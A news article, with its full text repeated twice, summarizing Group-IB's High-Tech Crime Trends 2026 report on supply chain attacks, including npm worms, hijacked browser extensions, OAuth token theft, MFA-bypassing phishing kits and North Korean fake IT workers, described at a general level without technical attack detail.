Digital infection strikes its chosen targets in a brutal domino effect.
In 2025, supply chain attacks will no longer be rare incidents but will become a systemic threat. In its new report, High-Tech Crime Trends 2026, Group-IB describes how attackers are increasingly targeting not just endpoints, but software vendors, SaaS platforms, and contractors to gain access to hundreds of organizations at once. This approach is changing the very logic of cybercrime and blurring the boundaries between individual incidents.
The report's authors emphasize that trust has become the primary vulnerability. A compromise of a single vendor or popular library can trigger a domino effect, affecting thousands of clients. According to the study, the IT, financial services, and transportation sectors will be the most vulnerable to attacks in 2025. The top ten countries most frequently targeted include the United States, Australia, France, the United Kingdom, and Japan.
Special attention is given to attacks on open source. Attackers deployed malicious packages, hijacked developer tokens, and introduced self-propagating worms into npm ecosystems and other repositories. The Shai-Hulud campaign affected hundreds of packages, and the second wave expanded to nearly 800 libraries. These compromises stole GitHub tokens, npm credentials, and project files, paving the way for further distribution of malicious code.
Browser extensions have also become a convenient entry point. The report describes a case involving a counterfeit version of the Trust Wallet Chrome extension, which compromised 2,520 wallets and caused damage exceeding $8.5 million. In another incident, attackers used phishing to gain control of a Cyberhaven extension and injected malicious code, impacting hundreds of thousands of users and becoming part of a larger campaign.
Phishing has evolved to steal OAuth tokens and bypass multi-factor authentication. Phishing-as-a-Service tools like Tycoon2FA allowed for the interception of Microsoft 365 and Gmail session data. At the same time, fully automated spam distribution services using generative AI have emerged. These platforms tailor emails to specific targets and help evade filters.
The report documents an increase in the abuse of synthetic identities. North Korean IT workers , operating under various pseudonyms, secured positions at foreign companies using fake resumes and deepfake interviews. This gave them long-term access to corporate infrastructure and partner integrations.
Notable incidents in 2025 include the compromise of legacy Oracle Cloud infrastructure, where an attacker known as rose87168 claimed to have obtained data from approximately 6 million users. Analysis of the sample revealed the presence of over 1,700 unique domains and records valid as of February 2025. Another example is the chain of compromises of Salesloft, Drift, and Salesforce via stolen OAuth tokens, which allowed access to customer data of several large companies.
Group-IB also reported supporting 52 law enforcement agencies in six international operations. As a result, 1,809 individuals were detained and over 34,000 malicious resources were eliminated. The company estimates that the confirmed damage from cybercrime exceeded $100 million.
The report's authors conclude that supply chain attacks will become even more automated and undetectable in 2026. AI will reduce the time from compromise to exploitation to hours or even minutes, and the primary target will remain tokens, API keys, and integrations that allow attackers to blend into legitimate processes.
In 2025, supply chain attacks will no longer be rare incidents but will become a systemic threat. In its new report, High-Tech Crime Trends 2026, Group-IB describes how attackers are increasingly targeting not just endpoints, but software vendors, SaaS platforms, and contractors to gain access to hundreds of organizations at once. This approach is changing the very logic of cybercrime and blurring the boundaries between individual incidents.
The report's authors emphasize that trust has become the primary vulnerability. A compromise of a single vendor or popular library can trigger a domino effect, affecting thousands of clients. According to the study, the IT, financial services, and transportation sectors will be the most vulnerable to attacks in 2025. The top ten countries most frequently targeted include the United States, Australia, France, the United Kingdom, and Japan.
Special attention is given to attacks on open source. Attackers deployed malicious packages, hijacked developer tokens, and introduced self-propagating worms into npm ecosystems and other repositories. The Shai-Hulud campaign affected hundreds of packages, and the second wave expanded to nearly 800 libraries. These compromises stole GitHub tokens, npm credentials, and project files, paving the way for further distribution of malicious code.
Browser extensions have also become a convenient entry point. The report describes a case involving a counterfeit version of the Trust Wallet Chrome extension, which compromised 2,520 wallets and caused damage exceeding $8.5 million. In another incident, attackers used phishing to gain control of a Cyberhaven extension and injected malicious code, impacting hundreds of thousands of users and becoming part of a larger campaign.
Phishing has evolved to steal OAuth tokens and bypass multi-factor authentication. Phishing-as-a-Service tools like Tycoon2FA allowed for the interception of Microsoft 365 and Gmail session data. At the same time, fully automated spam distribution services using generative AI have emerged. These platforms tailor emails to specific targets and help evade filters.
The report documents an increase in the abuse of synthetic identities. North Korean IT workers , operating under various pseudonyms, secured positions at foreign companies using fake resumes and deepfake interviews. This gave them long-term access to corporate infrastructure and partner integrations.
Notable incidents in 2025 include the compromise of legacy Oracle Cloud infrastructure, where an attacker known as rose87168 claimed to have obtained data from approximately 6 million users. Analysis of the sample revealed the presence of over 1,700 unique domains and records valid as of February 2025. Another example is the chain of compromises of Salesloft, Drift, and Salesforce via stolen OAuth tokens, which allowed access to customer data of several large companies.
Group-IB also reported supporting 52 law enforcement agencies in six international operations. As a result, 1,809 individuals were detained and over 34,000 malicious resources were eliminated. The company estimates that the confirmed damage from cybercrime exceeded $100 million.
The report's authors conclude that supply chain attacks will become even more automated and undetectable in 2026. AI will reduce the time from compromise to exploitation to hours or even minutes, and the primary target will remain tokens, API keys, and integrations that allow attackers to blend into legitimate processes.
